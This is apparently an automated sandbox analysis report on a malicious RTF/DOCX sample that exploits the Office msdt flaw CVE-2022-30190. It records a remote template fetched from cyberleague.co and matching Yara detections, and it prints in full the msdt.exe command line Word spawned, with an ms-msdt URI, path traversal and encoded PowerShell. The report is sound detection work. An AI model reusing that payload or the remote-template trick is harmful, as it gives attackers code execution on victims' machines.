        Source: 4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drString found in binary or memory: https://lookup.onenote.com/lookup/geolocation/v1
        Source: 4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drString found in binary or memory: https://management.azure.com
        Source: 4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drString found in binary or memory: https://management.azure.com/
        Source: 4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drString found in binary or memory: https://messaging.engagement.office.com/
        Source: 4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drString found in binary or memory: https://messaging.engagement.office.com/campaignmetadataaggregator
        Source: 4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drString found in binary or memory: https://messaging.office.com/
        Source: 4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drString found in binary or memory: https://metadata.templates.cdn.office.net/client/log
        Source: 4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drString found in binary or memory: https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicy
        Source: 4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drString found in binary or memory: https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
        Source: 4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drString found in binary or memory: https://ncus.contentsync.
        Source: 4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drString found in binary or memory: https://ncus.pagecontentsync.
        Source: 4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drString found in binary or memory: https://o365auditrealtimeingestion.manage.office.com
        Source: 4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drString found in binary or memory: https://o365auditrealtimeingestion.manage.office.com/api/userauditrecord
        Source: 4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drString found in binary or memory: https://o365diagnosticsppe-web.cloudapp.net
        Source: 4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drString found in binary or memory: https://ocos-office365-s2s.msedge.net/ab
        Source: 4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drString found in binary or memory: https://ofcrecsvcapi-int.azurewebsites.net/
        Source: 4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drString found in binary or memory: https://officeapps.live.com
        Source: 4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drString found in binary or memory: https://officeci.azurewebsites.net/api/
        Source: 4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drString found in binary or memory: https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asks
        Source: 4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drString found in binary or memory: https://officesetup.getmicrosoftkey.com
        Source: 4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drString found in binary or memory: https://ogma.osi.office.net/TradukoApi/api/v1.0/
        Source: 4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentities
        Source: 4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentitiesupdated
        Source: 4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officesharedentities
        Source: 4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officesharedentitiesupdated
        Source: 4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drString found in binary or memory: https://onedrive.live.com
        Source: 4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drString found in binary or memory: https://onedrive.live.com/about/download/?windows10SyncClientInstalled=false
        Source: 4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drString found in binary or memory: https://onedrive.live.com/embed?
        Source: 4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drString found in binary or memory: https://osi.office.net
        Source: 4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drString found in binary or memory: https://otelrules.azureedge.net
        Source: 4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drString found in binary or memory: https://outlook.office.com
        Source: 4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drString found in binary or memory: https://outlook.office.com/
        Source: 4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drString found in binary or memory: https://outlook.office.com/autosuggest/api/v1/init?cvid=
        Source: 4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drString found in binary or memory: https://outlook.office365.com
        Source: 4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drString found in binary or memory: https://outlook.office365.com/
        Source: 4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drString found in binary or memory: https://outlook.office365.com/api/v1.0/me/Activities
        Source: 4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drString found in binary or memory: https://outlook.office365.com/autodiscover/autodiscover.json
        Source: 4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drString found in binary or memory: https://ovisualuiapp.azurewebsites.net/pbiagave/
        Source: 4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drString found in binary or memory: https://pages.store.office.com/appshome.aspx?productgroup=Outlook
        Source: 4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drString found in binary or memory: https://pages.store.office.com/review/query
        Source: 4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drString found in binary or memory: https://pages.store.office.com/webapplandingpage.aspx
        Source: 4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drString found in binary or memory: https://partnerservices.getmicrosoftkey.com/PartnerProvisioning.svc/v1/subscriptions
        Source: 4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drString found in binary or memory: https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json
        Source: 4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drString found in binary or memory: https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json
        Source: 4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drString found in binary or memory: https://portal.office.com/account/?ref=ClientMeControl
        Source: 4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drString found in binary or memory: https://posarprodcssservice.accesscontrol.windows.net/v2/OAuth2-13
        Source: 4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drString found in binary or memory: https://powerlift-frontdesk.acompli.net
        Source: 4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drString found in binary or memory: https://powerlift.acompli.net
        Source: 4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drString found in binary or memory: https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-ios
        Source: 4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drString found in binary or memory: https://prod-global-autodetect.acompli.net/autodetect
        Source: 4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drString found in binary or memory: https://prod.mds.office.com/mds/api/v1.0/clientmodeldirectory
        Source: 4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drString found in binary or memory: https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.json
        Source: 4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drString found in binary or memory: https://res.getmicrosoftkey.com/api/redemptionevents
        Source: 4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drString found in binary or memory: https://roaming.edog.
        Source: 4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drString found in binary or memory: https://rpsticket.partnerservices.getmicrosoftkey.com
        Source: 4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drString found in binary or memory: https://settings.outlook.com
        Source: 4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drString found in binary or memory: https://shell.suite.office.com:1443
        Source: 4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drString found in binary or memory: https://skyapi.live.net/Activity/
        Source: 4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drString found in binary or memory: https://sr.outlook.office.net/ws/speech/recognize/assistant/work
        Source: 4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drString found in binary or memory: https://staging.cortana.ai
        Source: 4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drString found in binary or memory: https://storage.live.com/clientlogs/uploadlocation
        Source: 4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drString found in binary or memory: https://store.office.cn/addinstemplate
        Source: 4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drString found in binary or memory: https://store.office.de/addinstemplate
        Source: 4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drString found in binary or memory: https://substrate.office.com/search/api/v1/SearchHistory
        Source: 4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drString found in binary or memory: https://substrate.office.com/search/api/v2/init
        Source: 4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drString found in binary or memory: https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
        Source: 4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drString found in binary or memory: https://tasks.office.com
        Source: 4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drString found in binary or memory: https://uci.cdn.office.net/mirrored/smartlookup/current/
        Source: 4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drString found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.desktop.html
        Source: 4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drString found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.immersive.html
        Source: 4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drString found in binary or memory: https://visio.uservoice.com/forums/368202-visio-on-devices
        Source: 4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drString found in binary or memory: https://web.microsoftstream.com/video/
        Source: 4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drString found in binary or memory: https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/
        Source: 4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drString found in binary or memory: https://webshell.suite.office.com
        Source: 4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drString found in binary or memory: https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios
        Source: 4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drString found in binary or memory: https://wus2.contentsync.
        Source: 4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drString found in binary or memory: https://wus2.pagecontentsync.
        Source: 4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drString found in binary or memory: https://www.bingapis.com/api/v7/urlpreview/search?appid=E93048236FE27D972F67C5AF722136866DF65FA2
        Source: 4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drString found in binary or memory: https://www.odwebp.svc.ms
        Source: unknownDNS traffic detected: queries for: cyberleague.co
        Source: global trafficHTTP traffic detected: GET /th1s.html HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; ms-office; MSOffice 16)Accept-Encoding: gzip, deflateHost: cyberleague.coConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /th1s.html HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; ms-office; MSOffice 16)Accept-Encoding: gzip, deflateHost: cyberleague.coIf-Modified-Since: Wed, 01 Jun 2022 14:36:34 GMTIf-None-Match: "13e4-5e063d0e1ca1e"Connection: Keep-Alive
        Source: unknownHTTPS traffic detected: 13.250.15.191:443 -> 192.168.2.3:49741 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 13.250.15.191:443 -> 192.168.2.3:49747 version: TLS 1.2

        System Summary

        barindex
        Malicious sample detected (through community Yara rule)
        Source: document.xml.rels, type: SAMPLEMatched rule: Detects XML relations where an OLE object is refrencing an external target in dropper OOXML documents Author: ditekSHen
        Source: document.xml.rels, type: SAMPLEMatched rule: SUSP_Doc_WordXMLRels_May22 date = 2022-05-30, author = Tobias Michalski, Christian Burkard, Wojciech Cie\305\233lak, description = Detects a suspicious pattern in docx document.xml.rels file as seen in CVE-2022-30190, reference = https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, score = , modified = 2022-06-02, hash = 62f262d180a5a48f89be19369a8425bec596bc6a02ed23100424930791ae3df0
        Source: document.xml.rels, type: SAMPLEMatched rule: INDICATOR_OLE_RemoteTemplate author = ditekSHen, description = Detects XML relations where an OLE object is refrencing an external target in dropper OOXML documents
        Source: 00000009.00000002.553703750.0000000003140000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: SUSP_PS1_Msdt_Execution_May22 date = 2022-05-31, author = Nasreddine Bencherchali, Christian Burkard, description = Detects suspicious calls of msdt.exe as seen in CVE-2022-30190, reference = https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, score = , modified = 2022-06-02
        Source: 00000009.00000002.554020054.00000000033A0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: SUSP_PS1_Msdt_Execution_May22 date = 2022-05-31, author = Nasreddine Bencherchali, Christian Burkard, description = Detects suspicious calls of msdt.exe as seen in CVE-2022-30190, reference = https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, score = , modified = 2022-06-02
        Source: 00000009.00000002.553580729.0000000000A90000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: SUSP_PS1_Msdt_Execution_May22 date = 2022-05-31, author = Nasreddine Bencherchali, Christian Burkard, description = Detects suspicious calls of msdt.exe as seen in CVE-2022-30190, reference = https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, score = , modified = 2022-06-02
        Source: 00000009.00000002.553717920.0000000003148000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: SUSP_PS1_Msdt_Execution_May22 date = 2022-05-31, author = Nasreddine Bencherchali, Christian Burkard, description = Detects suspicious calls of msdt.exe as seen in CVE-2022-30190, reference = https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, score = , modified = 2022-06-02
        Source: Process Memory Space: msdt.exe PID: 7100, type: MEMORYSTRMatched rule: SUSP_PS1_Msdt_Execution_May22 date = 2022-05-31, author = Nasreddine Bencherchali, Christian Burkard, description = Detects suspicious calls of msdt.exe as seen in CVE-2022-30190, reference = https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, score = , modified = 2022-06-02
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\8EA7015A.htm, type: DROPPEDMatched rule: MAL_Msdt_MSProtocolURI_May22 date = 2022-05-30, author = Tobias Michalski, Christian Burkard, description = Detects the malicious usage of the ms-msdt URI as seen in CVE-2022-30190, reference = https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, score = , modified = 2022-05-31, hash = 4a24048f81afbe9fb62e7a6a49adbd1faf41f266b5f9feecdceb567aec096784
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PSUEOSZZ\th1s[1].htm, type: DROPPEDMatched rule: MAL_Msdt_MSProtocolURI_May22 date = 2022-05-30, author = Tobias Michalski, Christian Burkard, description = Detects the malicious usage of the ms-msdt URI as seen in CVE-2022-30190, reference = https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, score = , modified = 2022-05-31, hash = 4a24048f81afbe9fb62e7a6a49adbd1faf41f266b5f9feecdceb567aec096784
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\F640E46C.htm, type: DROPPEDMatched rule: MAL_Msdt_MSProtocolURI_May22 date = 2022-05-30, author = Tobias Michalski, Christian Burkard, description = Detects the malicious usage of the ms-msdt URI as seen in CVE-2022-30190, reference = https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, score = , modified = 2022-05-31, hash = 4a24048f81afbe9fb62e7a6a49adbd1faf41f266b5f9feecdceb567aec096784
        Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXESection loaded: sfc.dllJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CAJump to behavior
        Source: unknownProcess created: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE "C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE" /Automation -Embedding
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess created: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXE C:\Program Files (x86)\Microsoft Office\Office16\MsoSync.exe
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess created: C:\Windows\SysWOW64\msdt.exe C:\Windows\system32\msdt.exe" ms-msdt:/id PCWDiagnostic /skip force /param "IT_RebrowseForFile=cal?c IT_SelectProgram=NotListed IT_BrowseForFile=h$(IEX("powershell -EncodedCommand QQBkAGQALQBUAHkAcABlACAALQBBAHMAcwBlAG0AYgBsAHkATgBhAG0AZQAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwA7AFsAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzAC4ATQBlAHMAcwBhAGcAZQBCAG8AeABdADoAOgBTAGgAbwB3ACgAJwBIAGUAbABsAG8AIABpAHQAcwAgAG0AZQAhACAATQBhAHkAYgBlACAAeQBvAHUAIABjAG8AdQBsAGQAIABsAG8AbwBrACAAYQB0ACAAbQBkAHMAdAA/ACcAKQA7AA=="))i/../../../../../../../../../../../../../../Windows/System32/mpsigstub.exe
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess created: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXE C:\Program Files (x86)\Microsoft Office\Office16\MsoSync.exeJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess created: C:\Windows\SysWOW64\msdt.exe C:\Windows\system32\msdt.exe" ms-msdt:/id PCWDiagnostic /skip force /param "IT_RebrowseForFile=cal?c IT_SelectProgram=NotListed IT_BrowseForFile=h$(IEX("powershell -EncodedCommand QQBkAGQALQBUAHkAcABlACAALQBBAHMAcwBlAG0AYgBsAHkATgBhAG0AZQAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwA7AFsAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzAC4ATQBlAHMAcwBhAGcAZQBCAG8AeABdADoAOgBTAGgAbwB3ACgAJwBIAGUAbABsAG8AIABpAHQAcwAgAG0AZQAhACAATQBhAHkAYgBlACAAeQBvAHUAIABjAG8AdQBsAGQAIABsAG8AbwBrACAAYQB0ACAAbQBkAHMAdAA/ACcAKQA7AA=="))i/../../../../../../../../../../../../../../Windows/System32/mpsigstub.exe Jump to behavior
        Source: C:\Windows\SysWOW64\msdt.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{88d96a05-f192-11d4-a65f-0040963251e5}\InProcServer32Jump to behavior
        Source: 20220531_180800.rtf.LNK.0.drLNK file: ..\..\..\..\..\Desktop\20220531_180800.rtf
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.WordJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Temp\{76F41A02-472B-4714-A15B-4E9746E42478} - OProcSessId.datJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEFile written: C:\Users\user\AppData\Local\Microsoft\Office\16.0\OfficeFileCache\CentralTable.iniJump to behavior
        Source: classification engineClassification label: mal72.expl.evad.winRTF@5/15@2/1
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEFile read: C:\Users\desktop.iniJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
        Source: C:\Windows\SysWOW64\msdt.exeAutomated click: Next
        Source: C:\Windows\SysWOW64\msdt.exeAutomated click: Next
        Source: C:\Windows\SysWOW64\msdt.exeAutomated click: Next
        Source: C:\Windows\SysWOW64\msdt.exeAutomated click: Next
        Source: C:\Windows\SysWOW64\msdt.exeAutomated click: Next
        Source: C:\Windows\SysWOW64\msdt.exeAutomated click: Next
        Source: C:\Windows\SysWOW64\msdt.exeAutomated click: Next
        Source: C:\Windows\SysWOW64\msdt.exeAutomated click: Next
        Source: C:\Windows\SysWOW64\msdt.exeAutomated click: Next
        Source: C:\Windows\SysWOW64\msdt.exeAutomated click: Next
        Source: C:\Windows\SysWOW64\msdt.exeAutomated click: Next
        Source: C:\Windows\SysWOW64\msdt.exeAutomated click: Next
        Source: C:\Windows\SysWOW64\msdt.exeAutomated click: Next
        Source: C:\Windows\SysWOW64\msdt.exeAutomated click: Next
        Source: C:\Windows\SysWOW64\msdt.exeAutomated click: Next
        Source: C:\Windows\SysWOW64\msdt.exeAutomated click: Next
        Source: C:\Windows\SysWOW64\msdt.exeAutomated click: Next
        Source: C:\Windows\SysWOW64\msdt.exeAutomated click: Next
        Source: C:\Windows\SysWOW64\msdt.exeAutomated click: Next
        Source: C:\Windows\SysWOW64\msdt.exeAutomated click: Next
        Source: C:\Windows\SysWOW64\msdt.exeAutomated click: Next
        Source: C:\Windows\SysWOW64\msdt.exeAutomated click: Next
        Source: C:\Windows\SysWOW64\msdt.exeAutomated click: Next
        Source: C:\Windows\SysWOW64\msdt.exeAutomated click: Next
        Source: C:\Windows\SysWOW64\msdt.exeAutomated click: Next
        Source: C:\Windows\SysWOW64\msdt.exeAutomated click: Next
        Source: C:\Windows\SysWOW64\msdt.exeAutomated click: Next
        Source: C:\Windows\SysWOW64\msdt.exeAutomated click: Next
        Source: C:\Windows\SysWOW64\msdt.exeAutomated click: Next
        Source: C:\Windows\SysWOW64\msdt.exeAutomated click: Next
        Source: C:\Windows\SysWOW64\msdt.exeFile opened: C:\Windows\SysWOW64\MSFTEDIT.DLLJump to behavior
        Source: Window RecorderWindow detected: More than 3 window changes detected
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguagesJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEFile opened: C:\Windows\SysWOW64\MSVCR100.dllJump to behavior

        Data Obfuscation

        barindex
        Obfuscated document found, RTF is a DOCX
        Source: 20220531_180800.rtfInitial file: Document starts with PK

        Persistence and Installation Behavior

        barindex
        Contains an external reference to another file
        Source: document.xml.relsExtracted files from sample: https://cyberleague.co/th1s.html!
        Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXERegistry key monitored for changes: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\ExplorerJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
